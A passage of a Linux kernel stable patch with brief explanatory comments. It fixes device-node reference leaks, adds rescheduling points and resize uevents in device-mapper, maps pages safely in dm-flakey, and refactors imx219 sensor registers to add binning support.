+ 		return -EINVAL;
++	}
+ 
+ 	if (par_np == np)
+ 		par_np = NULL;
+@@ -52,8 +54,10 @@ int platform_irqchip_probe(struct platform_device *pdev)
+ 	 * interrupt controller. The actual initialization callback of this
+ 	 * interrupt controller can check for specific domains as necessary.
+ 	 */
+-	if (par_np && !irq_find_matching_host(par_np, DOMAIN_BUS_ANY))
++	if (par_np && !irq_find_matching_host(par_np, DOMAIN_BUS_ANY)) {
++		of_node_put(par_np);
+ 		return -EPROBE_DEFER;
++	}
+ 
+ 	return irq_init_cb(np, par_np);
+ }
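
The alpine-msi, mvebu-gicp, ti-sci-intr and irqchip.c hunks above all fix the same leak: OF helpers such as of_irq_find_parent() return a device_node with an elevated refcount, and every exit path, including the early error returns, must drop it with of_node_put() once the node is no longer needed. Common shape (illustrative, not any one of those drivers):

static int find_parent_domain(struct device_node *np,
			      struct irq_domain **out)
{
	struct device_node *parent = of_irq_find_parent(np); /* takes a ref */
	struct irq_domain *domain;

	if (!parent)
		return -ENODEV;

	domain = irq_find_host(parent);
	of_node_put(parent);	/* drop the ref on every path past this point */
	if (!domain)
		return -EPROBE_DEFER;

	*out = domain;
	return 0;
}
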
+diff --git a/drivers/leds/led-class.c b/drivers/leds/led-class.c
+index 6a8ea94834fa3..aa39b2a48fdff 100644
+--- a/drivers/leds/led-class.c
++++ b/drivers/leds/led-class.c
+@@ -235,14 +235,17 @@ struct led_classdev *of_led_get(struct device_node *np, int index)
+ 
+ 	led_dev = class_find_device_by_of_node(leds_class, led_node);
+ 	of_node_put(led_node);
++	put_device(led_dev);
+ 
+ 	if (!led_dev)
+ 		return ERR_PTR(-EPROBE_DEFER);
+ 
+ 	led_cdev = dev_get_drvdata(led_dev);
+ 
+-	if (!try_module_get(led_cdev->dev->parent->driver->owner))
++	if (!try_module_get(led_cdev->dev->parent->driver->owner)) {
++		put_device(led_cdev->dev);
+ 		return ERR_PTR(-ENODEV);
++	}
+ 
+ 	return led_cdev;
+ }
+@@ -255,6 +258,7 @@ EXPORT_SYMBOL_GPL(of_led_get);
+ void led_put(struct led_classdev *led_cdev)
+ {
+ 	module_put(led_cdev->dev->parent->driver->owner);
++	put_device(led_cdev->dev);
+ }
+ EXPORT_SYMBOL_GPL(led_put);
+ 
+diff --git a/drivers/leds/leds-is31fl319x.c b/drivers/leds/leds-is31fl319x.c
+index b2f4c4ec7c567..7c908414ac7e0 100644
+--- a/drivers/leds/leds-is31fl319x.c
++++ b/drivers/leds/leds-is31fl319x.c
+@@ -495,6 +495,11 @@ static inline int is31fl3196_db_to_gain(u32 dezibel)
+ 	return dezibel / IS31FL3196_AUDIO_GAIN_DB_STEP;
+ }
+ 
++static void is31f1319x_mutex_destroy(void *lock)
++{
++	mutex_destroy(lock);
++}
++
+ static int is31fl319x_probe(struct i2c_client *client)
+ {
+ 	struct is31fl319x_chip *is31;
+@@ -511,7 +516,7 @@ static int is31fl319x_probe(struct i2c_client *client)
+ 		return -ENOMEM;
+ 
+ 	mutex_init(&is31->lock);
+-	err = devm_add_action(dev, (void (*)(void *))mutex_destroy, &is31->lock);
++	err = devm_add_action_or_reset(dev, is31f1319x_mutex_destroy, &is31->lock);
+ 	if (err)
+ 		return err;
+ 
+diff --git a/drivers/leds/simple/simatic-ipc-leds-gpio.c b/drivers/leds/simple/simatic-ipc-leds-gpio.c
+index 07f0d79d604d4..e8d329b5a68c3 100644
+--- a/drivers/leds/simple/simatic-ipc-leds-gpio.c
++++ b/drivers/leds/simple/simatic-ipc-leds-gpio.c
+@@ -77,6 +77,8 @@ static int simatic_ipc_leds_gpio_probe(struct platform_device *pdev)
+ 
+ 	switch (plat->devmode) {
+ 	case SIMATIC_IPC_DEVICE_127E:
++		if (!IS_ENABLED(CONFIG_PINCTRL_BROXTON))
++			return -ENODEV;
+ 		simatic_ipc_led_gpio_table = &simatic_ipc_led_gpio_table_127e;
+ 		break;
+ 	case SIMATIC_IPC_DEVICE_227G:
+diff --git a/drivers/md/dm-bufio.c b/drivers/md/dm-bufio.c
+index bb786c39545ec..19caaf684ee34 100644
+--- a/drivers/md/dm-bufio.c
++++ b/drivers/md/dm-bufio.c
+@@ -1833,7 +1833,7 @@ struct dm_bufio_client *dm_bufio_client_create(struct block_device *bdev, unsign
+ 	c->shrinker.scan_objects = dm_bufio_shrink_scan;
+ 	c->shrinker.seeks = 1;
+ 	c->shrinker.batch = 0;
+-	r = register_shrinker(&c->shrinker, "md-%s:(%u:%u)", slab_name,
++	r = register_shrinker(&c->shrinker, "dm-bufio:(%u:%u)",
+ 			      MAJOR(bdev->bd_dev), MINOR(bdev->bd_dev));
+ 	if (r)
+ 		goto bad;
+diff --git a/drivers/md/dm-cache-background-tracker.c b/drivers/md/dm-cache-background-tracker.c
+index 84814e819e4c3..7887f99b82bd5 100644
+--- a/drivers/md/dm-cache-background-tracker.c
++++ b/drivers/md/dm-cache-background-tracker.c
+@@ -60,6 +60,14 @@ EXPORT_SYMBOL_GPL(btracker_create);
+ 
+ void btracker_destroy(struct background_tracker *b)
+ {
++	struct bt_work *w, *tmp;
++
++	BUG_ON(!list_empty(&b->issued));
++	list_for_each_entry_safe (w, tmp, &b->queued, list) {
++		list_del(&w->list);
++		kmem_cache_free(b->work_cache, w);
++	}
++
+ 	kmem_cache_destroy(b->work_cache);
+ 	kfree(b);
+ }
+diff --git a/drivers/md/dm-cache-target.c b/drivers/md/dm-cache-target.c
+index 5e92fac90b675..17fde3e5a1f7b 100644
+--- a/drivers/md/dm-cache-target.c
++++ b/drivers/md/dm-cache-target.c
+@@ -1805,6 +1805,7 @@ static void process_deferred_bios(struct work_struct *ws)
+ 
+ 		else
+ 			commit_needed = process_bio(cache, bio) || commit_needed;
++		cond_resched();
+ 	}
+ 
+ 	if (commit_needed)
+@@ -1827,6 +1828,7 @@ static void requeue_deferred_bios(struct cache *cache)
+ 	while ((bio = bio_list_pop(&bios))) {
+ 		bio->bi_status = BLK_STS_DM_REQUEUE;
+ 		bio_endio(bio);
++		cond_resched();
+ 	}
+ }
+ 
+@@ -1867,6 +1869,8 @@ static void check_migrations(struct work_struct *ws)
+ 		r = mg_start(cache, op, NULL);
+ 		if (r)
+ 			break;
++
++		cond_resched();
+ 	}
+ }
+ 
+diff --git a/drivers/md/dm-flakey.c b/drivers/md/dm-flakey.c
+index 89fa7a68c6c42..335684a1aeaa5 100644
+--- a/drivers/md/dm-flakey.c
++++ b/drivers/md/dm-flakey.c
+@@ -303,9 +303,13 @@ static void corrupt_bio_data(struct bio *bio, struct flakey_c *fc)
+ 	 */
+ 	bio_for_each_segment(bvec, bio, iter) {
+ 		if (bio_iter_len(bio, iter) > corrupt_bio_byte) {
+-			char *segment = (page_address(bio_iter_page(bio, iter))
+-					 + bio_iter_offset(bio, iter));
++			char *segment;
++			struct page *page = bio_iter_page(bio, iter);
++			if (unlikely(page == ZERO_PAGE(0)))
++				break;
++			segment = bvec_kmap_local(&bvec);
+ 			segment[corrupt_bio_byte] = fc->corrupt_bio_value;
++			kunmap_local(segment);
+ 			DMDEBUG("Corrupting data bio=%p by writing %u to byte %u "
+ 				"(rw=%c bi_opf=%u bi_sector=%llu size=%u)\n",
+ 				bio, fc->corrupt_bio_value, fc->corrupt_bio_byte,
+@@ -361,9 +365,11 @@ static int flakey_map(struct dm_target *ti, struct bio *bio)
+ 		/*
+ 		 * Corrupt matching writes.
+ 		 */
+-		if (fc->corrupt_bio_byte && (fc->corrupt_bio_rw == WRITE)) {
+-			if (all_corrupt_bio_flags_match(bio, fc))
+-				corrupt_bio_data(bio, fc);
++		if (fc->corrupt_bio_byte) {
++			if (fc->corrupt_bio_rw == WRITE) {
++				if (all_corrupt_bio_flags_match(bio, fc))
++					corrupt_bio_data(bio, fc);
++			}
+ 			goto map_bio;
+ 		}
+ 
+@@ -389,13 +395,14 @@ static int flakey_end_io(struct dm_target *ti, struct bio *bio,
+ 		return DM_ENDIO_DONE;
+ 
+ 	if (!*error && pb->bio_submitted && (bio_data_dir(bio) == READ)) {
+-		if (fc->corrupt_bio_byte && (fc->corrupt_bio_rw == READ) &&
+-		    all_corrupt_bio_flags_match(bio, fc)) {
+-			/*
+-			 * Corrupt successful matching READs while in down state.
+-			 */
+-			corrupt_bio_data(bio, fc);
+-
++		if (fc->corrupt_bio_byte) {
++			if ((fc->corrupt_bio_rw == READ) &&
++			    all_corrupt_bio_flags_match(bio, fc)) {
++				/*
++				 * Corrupt successful matching READs while in down state.
++				 */
++				corrupt_bio_data(bio, fc);
++			}
+ 		} else if (!test_bit(DROP_WRITES, &fc->flags) &&
+ 			   !test_bit(ERROR_WRITES, &fc->flags)) {
+ 			/*
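
Two separate problems are fixed in corrupt_bio_data() above: the shared ZERO_PAGE must never be written, since it backs every untouched zero-filled mapping in the system, and page_address() is only valid for pages with a permanent kernel mapping, so highmem pages need a short-lived local map. The second point is the same kmap discipline the rxe copy paths earlier in this patch use; the minimal shape is:

	/* touching bio payload safely, highmem included (sketch) */
	char *p = bvec_kmap_local(&bvec);	/* short-lived, CPU-local map */

	p[corrupt_byte] = value;
	kunmap_local(p);
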
+diff --git a/drivers/md/dm-ioctl.c b/drivers/md/dm-ioctl.c
+index 36fc6ae4737a0..e031088ff15c6 100644
+--- a/drivers/md/dm-ioctl.c
++++ b/drivers/md/dm-ioctl.c
+@@ -482,7 +482,7 @@ static struct mapped_device *dm_hash_rename(struct dm_ioctl *param,
+ 		dm_table_event(table);
+ 	dm_put_live_table(hc->md, srcu_idx);
+ 
+-	if (!dm_kobject_uevent(hc->md, KOBJ_CHANGE, param->event_nr))
++	if (!dm_kobject_uevent(hc->md, KOBJ_CHANGE, param->event_nr, false))
+ 		param->flags |= DM_UEVENT_GENERATED_FLAG;
+ 
+ 	md = hc->md;
+@@ -995,7 +995,7 @@ static int dev_remove(struct file *filp, struct dm_ioctl *param, size_t param_si
+ 
+ 	dm_ima_measure_on_device_remove(md, false);
+ 
+-	if (!dm_kobject_uevent(md, KOBJ_REMOVE, param->event_nr))
++	if (!dm_kobject_uevent(md, KOBJ_REMOVE, param->event_nr, false))
+ 		param->flags |= DM_UEVENT_GENERATED_FLAG;
+ 
+ 	dm_put(md);
+@@ -1129,6 +1129,7 @@ static int do_resume(struct dm_ioctl *param)
+ 	struct hash_cell *hc;
+ 	struct mapped_device *md;
+ 	struct dm_table *new_map, *old_map = NULL;
++	bool need_resize_uevent = false;
+ 
+ 	down_write(&_hash_lock);
+ 
+@@ -1149,6 +1150,8 @@ static int do_resume(struct dm_ioctl *param)
+ 
+ 	/* Do we need to load a new map ? */
+ 	if (new_map) {
++		sector_t old_size, new_size;
++
+ 		/* Suspend if it isn't already suspended */
+ 		if (param->flags & DM_SKIP_LOCKFS_FLAG)
+ 			suspend_flags &= ~DM_SUSPEND_LOCKFS_FLAG;
+@@ -1157,6 +1160,7 @@ static int do_resume(struct dm_ioctl *param)
+ 		if (!dm_suspended_md(md))
+ 			dm_suspend(md, suspend_flags);
+ 
++		old_size = dm_get_size(md);
+ 		old_map = dm_swap_table(md, new_map);
+ 		if (IS_ERR(old_map)) {
+ 			dm_sync_table(md);
+@@ -1164,6 +1168,9 @@ static int do_resume(struct dm_ioctl *param)
+ 			dm_put(md);
+ 			return PTR_ERR(old_map);
+ 		}
++		new_size = dm_get_size(md);
++		if (old_size && new_size && old_size != new_size)
++			need_resize_uevent = true;
+ 
+ 		if (dm_table_get_mode(new_map) & FMODE_WRITE)
+ 			set_disk_ro(dm_disk(md), 0);
+@@ -1176,7 +1183,7 @@ static int do_resume(struct dm_ioctl *param)
+ 		if (!r) {
+ 			dm_ima_measure_on_device_resume(md, new_map ? true : false);
+ 
+-			if (!dm_kobject_uevent(md, KOBJ_CHANGE, param->event_nr))
++			if (!dm_kobject_uevent(md, KOBJ_CHANGE, param->event_nr, need_resize_uevent))
+ 				param->flags |= DM_UEVENT_GENERATED_FLAG;
+ 		}
+ 	}
+diff --git a/drivers/md/dm-thin.c b/drivers/md/dm-thin.c
+index 64cfcf46881dc..e4c1a8a21bbd0 100644
+--- a/drivers/md/dm-thin.c
++++ b/drivers/md/dm-thin.c
+@@ -2207,6 +2207,7 @@ static void process_thin_deferred_bios(struct thin_c *tc)
+ 			throttle_work_update(&pool->throttle);
+ 			dm_pool_issue_prefetches(pool->pmd);
+ 		}
++		cond_resched();
+ 	}
+ 	blk_finish_plug(&plug);
+ }
+@@ -2289,6 +2290,7 @@ static void process_thin_deferred_cells(struct thin_c *tc)
+ 			else
+ 				pool->process_cell(tc, cell);
+ 		}
++		cond_resched();
+ 	} while (!list_empty(&cells));
+ }
+ 
+diff --git a/drivers/md/dm-zoned-metadata.c b/drivers/md/dm-zoned-metadata.c
+index 0278482fac94a..c795ea7da7917 100644
+--- a/drivers/md/dm-zoned-metadata.c
++++ b/drivers/md/dm-zoned-metadata.c
+@@ -2945,7 +2945,7 @@ int dmz_ctr_metadata(struct dmz_dev *dev, int num_dev,
+ 	zmd->mblk_shrinker.seeks = DEFAULT_SEEKS;
+ 
+ 	/* Metadata cache shrinker */
+-	ret = register_shrinker(&zmd->mblk_shrinker, "md-meta:(%u:%u)",
++	ret = register_shrinker(&zmd->mblk_shrinker, "dm-zoned-meta:(%u:%u)",
+ 				MAJOR(dev->bdev->bd_dev),
+ 				MINOR(dev->bdev->bd_dev));
+ 	if (ret) {
+diff --git a/drivers/md/dm.c b/drivers/md/dm.c
+index b424a6ee27baf..605662935ce91 100644
+--- a/drivers/md/dm.c
++++ b/drivers/md/dm.c
+@@ -231,7 +231,6 @@ out_uevent_exit:
+ 
+ static void local_exit(void)
+ {
+-	flush_scheduled_work();
+ 	destroy_workqueue(deferred_remove_workqueue);
+ 
+ 	unregister_blkdev(_major, _name);
+@@ -1008,6 +1007,7 @@ static void dm_wq_requeue_work(struct work_struct *work)
+ 		io->next = NULL;
+ 		__dm_io_complete(io, false);
+ 		io = next;
++		cond_resched();
+ 	}
+ }
+ 
+@@ -2172,10 +2172,7 @@ static struct dm_table *__bind(struct mapped_device *md, struct dm_table *t,
+ 	if (size != dm_get_size(md))
+ 		memset(&md->geometry, 0, sizeof(md->geometry));
+ 
+-	if (!get_capacity(md->disk))
+-		set_capacity(md->disk, size);
+-	else
+-		set_capacity_and_notify(md->disk, size);
++	set_capacity(md->disk, size);
+ 
+ 	dm_table_event_callback(t, event_callback, md);
+ 
+@@ -2569,6 +2566,7 @@ static void dm_wq_work(struct work_struct *work)
+ 			break;
+ 
+ 		submit_bio_noacct(bio);
++		cond_resched();
+ 	}
+ }
+ 
+@@ -2968,24 +2966,26 @@ EXPORT_SYMBOL_GPL(dm_internal_resume_fast);
+  * Event notification.
+  *---------------------------------------------------------------*/
+ int dm_kobject_uevent(struct mapped_device *md, enum kobject_action action,
+-		       unsigned cookie)
++		      unsigned cookie, bool need_resize_uevent)
+ {
+ 	int r;
+ 	unsigned noio_flag;
+ 	char udev_cookie[DM_COOKIE_LENGTH];
+-	char *envp[] = { udev_cookie, NULL };
+-
+-	noio_flag = memalloc_noio_save();
+-
+-	if (!cookie)
+-		r = kobject_uevent(&disk_to_dev(md->disk)->kobj, action);
+-	else {
++	char *envp[3] = { NULL, NULL, NULL };
++	char **envpp = envp;
++	if (cookie) {
+ 		snprintf(udev_cookie, DM_COOKIE_LENGTH, "%s=%u",
+ 			 DM_COOKIE_ENV_VAR_NAME, cookie);
+-		r = kobject_uevent_env(&disk_to_dev(md->disk)->kobj,
+-				       action, envp);
++		*envpp++ = udev_cookie;
++	}
++	if (need_resize_uevent) {
++		*envpp++ = "RESIZE=1";
+ 	}
+ 
++	noio_flag = memalloc_noio_save();
++
++	r = kobject_uevent_env(&disk_to_dev(md->disk)->kobj, action, envp);
++
+ 	memalloc_noio_restore(noio_flag);
+ 
+ 	return r;
+diff --git a/drivers/md/dm.h b/drivers/md/dm.h
+index 5201df03ce402..a9a3ffcad084c 100644
+--- a/drivers/md/dm.h
++++ b/drivers/md/dm.h
+@@ -203,7 +203,7 @@ int dm_get_table_device(struct mapped_device *md, dev_t dev, fmode_t mode,
+ void dm_put_table_device(struct mapped_device *md, struct dm_dev *d);
+ 
+ int dm_kobject_uevent(struct mapped_device *md, enum kobject_action action,
+-		      unsigned cookie);
++		      unsigned cookie, bool need_resize_uevent);
+ 
+ void dm_internal_suspend(struct mapped_device *md);
+ void dm_internal_resume(struct mapped_device *md);
+diff --git a/drivers/md/md.c b/drivers/md/md.c
+index 02b0240e7c715..272cc5d14906f 100644
+--- a/drivers/md/md.c
++++ b/drivers/md/md.c
+@@ -9030,7 +9030,7 @@ void md_do_sync(struct md_thread *thread)
+ 	mddev->pers->sync_request(mddev, max_sectors, &skipped);
+ 
+ 	if (!test_bit(MD_RECOVERY_CHECK, &mddev->recovery) &&
+-	    mddev->curr_resync >= MD_RESYNC_ACTIVE) {
++	    mddev->curr_resync > MD_RESYNC_ACTIVE) {
+ 		if (test_bit(MD_RECOVERY_SYNC, &mddev->recovery)) {
+ 			if (test_bit(MD_RECOVERY_INTR, &mddev->recovery)) {
+ 				if (mddev->curr_resync >= mddev->recovery_cp) {
+diff --git a/drivers/media/i2c/imx219.c b/drivers/media/i2c/imx219.c
+index 77bd79a5954ed..7a14688f8c228 100644
+--- a/drivers/media/i2c/imx219.c
++++ b/drivers/media/i2c/imx219.c
+@@ -89,6 +89,12 @@
+ 
+ #define IMX219_REG_ORIENTATION		0x0172
+ 
++/* Binning  Mode */
++#define IMX219_REG_BINNING_MODE		0x0174
++#define IMX219_BINNING_NONE		0x0000
++#define IMX219_BINNING_2X2		0x0101
++#define IMX219_BINNING_2X2_ANALOG	0x0303
++
+ /* Test Pattern Control */
+ #define IMX219_REG_TEST_PATTERN		0x0600
+ #define IMX219_TEST_PATTERN_DISABLE	0
+@@ -143,25 +149,66 @@ struct imx219_mode {
+ 
+ 	/* Default register values */
+ 	struct imx219_reg_list reg_list;
++
++	/* 2x2 binning is used */
++	bool binning;
+ };
+ 
+-/*
+- * Register sets lifted off the i2C interface from the Raspberry Pi firmware
+- * driver.
+- * 3280x2464 = mode 2, 1920x1080 = mode 1, 1640x1232 = mode 4, 640x480 = mode 7.
+- */
+-static const struct imx219_reg mode_3280x2464_regs[] = {
+-	{0x0100, 0x00},
++static const struct imx219_reg imx219_common_regs[] = {
++	{0x0100, 0x00},	/* Mode Select */
++
++	/* To Access Addresses 3000-5fff, send the following commands */
+ 	{0x30eb, 0x0c},
+ 	{0x30eb, 0x05},
+ 	{0x300a, 0xff},
+ 	{0x300b, 0xff},
+ 	{0x30eb, 0x05},
+ 	{0x30eb, 0x09},
+-	{0x0114, 0x01},
+-	{0x0128, 0x00},
+-	{0x012a, 0x18},
++
++	/* PLL Clock Table */
++	{0x0301, 0x05},	/* VTPXCK_DIV */
++	{0x0303, 0x01},	/* VTSYSCK_DIV */
++	{0x0304, 0x03},	/* PREPLLCK_VT_DIV 0x03 = AUTO set */
++	{0x0305, 0x03}, /* PREPLLCK_OP_DIV 0x03 = AUTO set */
++	{0x0306, 0x00},	/* PLL_VT_MPY */
++	{0x0307, 0x39},
++	{0x030b, 0x01},	/* OP_SYS_CLK_DIV */
++	{0x030c, 0x00},	/* PLL_OP_MPY */
++	{0x030d, 0x72},
++
++	/* Undocumented registers */
++	{0x455e, 0x00},
++	{0x471e, 0x4b},
++	{0x4767, 0x0f},
++	{0x4750, 0x14},
++	{0x4540, 0x00},
++	{0x47b4, 0x14},
++	{0x4713, 0x30},
++	{0x478b, 0x10},
++	{0x478f, 0x10},
++	{0x4793, 0x10},
++	{0x4797, 0x0e},
++	{0x479b, 0x0e},
++
++	/* Frame Bank Register Group "A" */
++	{0x0162, 0x0d},	/* Line_Length_A */
++	{0x0163, 0x78},
++	{0x0170, 0x01}, /* X_ODD_INC_A */
++	{0x0171, 0x01}, /* Y_ODD_INC_A */
++
++	/* Output setup registers */
++	{0x0114, 0x01},	/* CSI 2-Lane Mode */
++	{0x0128, 0x00},	/* DPHY Auto Mode */
++	{0x012a, 0x18},	/* EXCK_Freq */
+ 	{0x012b, 0x00},
++};
++
++/*
++ * Register sets lifted off the I2C interface from the Raspberry Pi firmware
++ * driver.
++ * 3280x2464 = mode 2, 1920x1080 = mode 1, 1640x1232 = mode 4, 640x480 = mode 7.
++ */
++static const struct imx219_reg mode_3280x2464_regs[] = {
+ 	{0x0164, 0x00},
+ 	{0x0165, 0x00},
+ 	{0x0166, 0x0c},
+@@ -174,53 +221,13 @@ static const struct imx219_reg mode_3280x2464_regs[] = {
+ 	{0x016d, 0xd0},
+ 	{0x016e, 0x09},
+ 	{0x016f, 0xa0},
+-	{0x0170, 0x01},
+-	{0x0171, 0x01},
+-	{0x0174, 0x00},
+-	{0x0175, 0x00},
+-	{0x0301, 0x05},
+-	{0x0303, 0x01},
+-	{0x0304, 0x03},
+-	{0x0305, 0x03},
+-	{0x0306, 0x00},
+-	{0x0307, 0x39},
+-	{0x030b, 0x01},
+-	{0x030c, 0x00},
+-	{0x030d, 0x72},
+ 	{0x0624, 0x0c},
+ 	{0x0625, 0xd0},
+ 	{0x0626, 0x09},
+ 	{0x0627, 0xa0},
+-	{0x455e, 0x00},
+-	{0x471e, 0x4b},
+-	{0x4767, 0x0f},
+-	{0x4750, 0x14},
+-	{0x4540, 0x00},
+-	{0x47b4, 0x14},
+-	{0x4713, 0x30},
+-	{0x478b, 0x10},
+-	{0x478f, 0x10},
+-	{0x4793, 0x10},
+-	{0x4797, 0x0e},
+-	{0x479b, 0x0e},
+-	{0x0162, 0x0d},
+-	{0x0163, 0x78},
+ };
+ 
+ static const struct imx219_reg mode_1920_1080_regs[] = {
+-	{0x0100, 0x00},
+-	{0x30eb, 0x05},
+-	{0x30eb, 0x0c},
+-	{0x300a, 0xff},
+-	{0x300b, 0xff},
+-	{0x30eb, 0x05},
+-	{0x30eb, 0x09},
+-	{0x0114, 0x01},
+-	{0x0128, 0x00},
+-	{0x012a, 0x18},
+-	{0x012b, 0x00},
+-	{0x0162, 0x0d},
+-	{0x0163, 0x78},
+ 	{0x0164, 0x02},
+ 	{0x0165, 0xa8},
+ 	{0x0166, 0x0a},
+@@ -233,49 +240,13 @@ static const struct imx219_reg mode_1920_1080_regs[] = {
+ 	{0x016d, 0x80},
+ 	{0x016e, 0x04},
+ 	{0x016f, 0x38},
+-	{0x0170, 0x01},
+-	{0x0171, 0x01},
+-	{0x0174, 0x00},
+-	{0x0175, 0x00},
+-	{0x0301, 0x05},
+-	{0x0303, 0x01},
+-	{0x0304, 0x03},
+-	{0x0305, 0x03},
+-	{0x0306, 0x00},
+-	{0x0307, 0x39},
+-	{0x030b, 0x01},
+-	{0x030c, 0x00},
+-	{0x030d, 0x72},
+ 	{0x0624, 0x07},
+ 	{0x0625, 0x80},
+ 	{0x0626, 0x04},
+ 	{0x0627, 0x38},
+-	{0x455e, 0x00},
+-	{0x471e, 0x4b},
+-	{0x4767, 0x0f},
+-	{0x4750, 0x14},
+-	{0x4540, 0x00},
+-	{0x47b4, 0x14},
+-	{0x4713, 0x30},
+-	{0x478b, 0x10},
+-	{0x478f, 0x10},
+-	{0x4793, 0x10},
+-	{0x4797, 0x0e},
+-	{0x479b, 0x0e},
+ };
+ 
+ static const struct imx219_reg mode_1640_1232_regs[] = {
+-	{0x0100, 0x00},
+-	{0x30eb, 0x0c},
+-	{0x30eb, 0x05},
+-	{0x300a, 0xff},
+-	{0x300b, 0xff},
+-	{0x30eb, 0x05},
+-	{0x30eb, 0x09},
+-	{0x0114, 0x01},
+-	{0x0128, 0x00},
+-	{0x012a, 0x18},
+-	{0x012b, 0x00},
+ 	{0x0164, 0x00},
+ 	{0x0165, 0x00},
+ 	{0x0166, 0x0c},
+@@ -288,53 +259,13 @@ static const struct imx219_reg mode_1640_1232_regs[] = {
+ 	{0x016d, 0x68},
+ 	{0x016e, 0x04},
+ 	{0x016f, 0xd0},
+-	{0x0170, 0x01},
+-	{0x0171, 0x01},
+-	{0x0174, 0x01},
+-	{0x0175, 0x01},
+-	{0x0301, 0x05},
+-	{0x0303, 0x01},
+-	{0x0304, 0x03},
+-	{0x0305, 0x03},
+-	{0x0306, 0x00},
+-	{0x0307, 0x39},
+-	{0x030b, 0x01},
+-	{0x030c, 0x00},
+-	{0x030d, 0x72},
+ 	{0x0624, 0x06},
+ 	{0x0625, 0x68},
+ 	{0x0626, 0x04},
+ 	{0x0627, 0xd0},
+-	{0x455e, 0x00},
+-	{0x471e, 0x4b},
+-	{0x4767, 0x0f},
+-	{0x4750, 0x14},
+-	{0x4540, 0x00},
+-	{0x47b4, 0x14},
+-	{0x4713, 0x30},
+-	{0x478b, 0x10},
+-	{0x478f, 0x10},
+-	{0x4793, 0x10},
+-	{0x4797, 0x0e},
+-	{0x479b, 0x0e},
+-	{0x0162, 0x0d},
+-	{0x0163, 0x78},
+ };
+ 
+ static const struct imx219_reg mode_640_480_regs[] = {
+-	{0x0100, 0x00},
+-	{0x30eb, 0x05},
+-	{0x30eb, 0x0c},
+-	{0x300a, 0xff},
+-	{0x300b, 0xff},
+-	{0x30eb, 0x05},
+-	{0x30eb, 0x09},
+-	{0x0114, 0x01},
+-	{0x0128, 0x00},
+-	{0x012a, 0x18},
+-	{0x012b, 0x00},
+-	{0x0162, 0x0d},
+-	{0x0163, 0x78},
+ 	{0x0164, 0x03},
+ 	{0x0165, 0xe8},
+ 	{0x0166, 0x08},
+@@ -347,35 +278,10 @@ static const struct imx219_reg mode_640_480_regs[] = {
+ 	{0x016d, 0x80},
+ 	{0x016e, 0x01},
+ 	{0x016f, 0xe0},
+-	{0x0170, 0x01},
+-	{0x0171, 0x01},
+-	{0x0174, 0x03},
+-	{0x0175, 0x03},
+-	{0x0301, 0x05},
+-	{0x0303, 0x01},
+-	{0x0304, 0x03},
+-	{0x0305, 0x03},
+-	{0x0306, 0x00},
+-	{0x0307, 0x39},
+-	{0x030b, 0x01},
+-	{0x030c, 0x00},
+-	{0x030d, 0x72},
+ 	{0x0624, 0x06},
+ 	{0x0625, 0x68},
+ 	{0x0626, 0x04},
+ 	{0x0627, 0xd0},
+-	{0x455e, 0x00},
+-	{0x471e, 0x4b},
+-	{0x4767, 0x0f},
+-	{0x4750, 0x14},
+-	{0x4540, 0x00},
+-	{0x47b4, 0x14},
+-	{0x4713, 0x30},
+-	{0x478b, 0x10},
+-	{0x478f, 0x10},
+-	{0x4793, 0x10},
+-	{0x4797, 0x0e},
+-	{0x479b, 0x0e},
+ };
+ 
+ static const struct imx219_reg raw8_framefmt_regs[] = {
+@@ -485,6 +391,7 @@ static const struct imx219_mode supported_modes[] = {
+ 			.num_of_regs = ARRAY_SIZE(mode_3280x2464_regs),
+ 			.regs = mode_3280x2464_regs,
+ 		},
++		.binning = false,
+ 	},
+ 	{
+ 		/* 1080P 30fps cropped */
+@@ -501,6 +408,7 @@ static const struct imx219_mode supported_modes[] = {
+ 			.num_of_regs = ARRAY_SIZE(mode_1920_1080_regs),
+ 			.regs = mode_1920_1080_regs,
+ 		},
++		.binning = false,
+ 	},
+ 	{
+ 		/* 2x2 binned 30fps mode */
+@@ -517,6 +425,7 @@ static const struct imx219_mode supported_modes[] = {
+ 			.num_of_regs = ARRAY_SIZE(mode_1640_1232_regs),
+ 			.regs = mode_1640_1232_regs,
+ 		},
++		.binning = true,
+ 	},
+ 	{
+ 		/* 640x480 30fps mode */
+@@ -533,6 +442,7 @@ static const struct imx219_mode supported_modes[] = {
+ 			.num_of_regs = ARRAY_SIZE(mode_640_480_regs),
+ 			.regs = mode_640_480_regs,
+ 		},
++		.binning = true,
+ 	},
+ };
+ 
+@@ -979,6 +889,35 @@ static int imx219_set_framefmt(struct imx219 *imx219)
+ 	return -EINVAL;
+ }
+ 
++static int imx219_set_binning(struct imx219 *imx219)
++{
++	if (!imx219->mode->binning) {
++		return imx219_write_reg(imx219, IMX219_REG_BINNING_MODE,
++					IMX219_REG_VALUE_16BIT,
++					IMX219_BINNING_NONE);
++	}
++
++	switch (imx219->fmt.code) {
++	case MEDIA_BUS_FMT_SRGGB8_1X8:
++	case MEDIA_BUS_FMT_SGRBG8_1X8:
++	case MEDIA_BUS_FMT_SGBRG8_1X8:
++	case MEDIA_BUS_FMT_SBGGR8_1X8:
++		return imx219_write_reg(imx219, IMX219_REG_BINNING_MODE,
++					IMX219_REG_VALUE_16BIT,
++					IMX219_BINNING_2X2_ANALOG);
++
++	case MEDIA_BUS_FMT_SRGGB10_1X10:
++	case MEDIA_BUS_FMT_SGRBG10_1X10:
++	case MEDIA_BUS_FMT_SGBRG10_1X10:
++	case MEDIA_BUS_FMT_SBGGR10_1X10:
++		return imx219_write_reg(imx219, IMX219_REG_BINNING_MODE,
++					IMX219_REG_VALUE_16BIT,
++					IMX219_BINNING_2X2);
++	}
++
++	return -EINVAL;
++}
++
+ static const struct v4l2_rect *
+ __imx219_get_pad_crop(struct imx219 *imx219,
+ 		      struct v4l2_subdev_state *sd_state,
+@@ -1041,6 +980,13 @@ static int imx219_start_streaming(struct imx219 *imx219)
+ 	if (ret < 0)
+ 		return ret;
+ 
++	/* Send all registers that are common to all modes */
++	ret = imx219_write_regs(imx219, imx219_common_regs, ARRAY_SIZE(imx219_common_regs));
++	if (ret) {
++		dev_err(&client->dev, "%s failed to send mfg header\n", __func__);
++		goto err_rpm_put;
++	}
++
+ 	/* Apply default values of current mode */
+ 	reg_list = &imx219->mode->reg_list;
+ 	ret = imx219_write_regs(imx219, reg_list->regs, reg_list->num_of_regs);
+@@ -1056,6 +1002,13 @@ static int imx219_start_streaming(struct imx219 *imx219)
+ 		goto err_rpm_put;
+ 	}
+ 
++	ret = imx219_set_binning(imx219);
++	if (ret) {
++		dev_err(&client->dev, "%s failed to set binning: %d\n",
++			__func__, ret);
++		goto err_rpm_put;
++	}
++
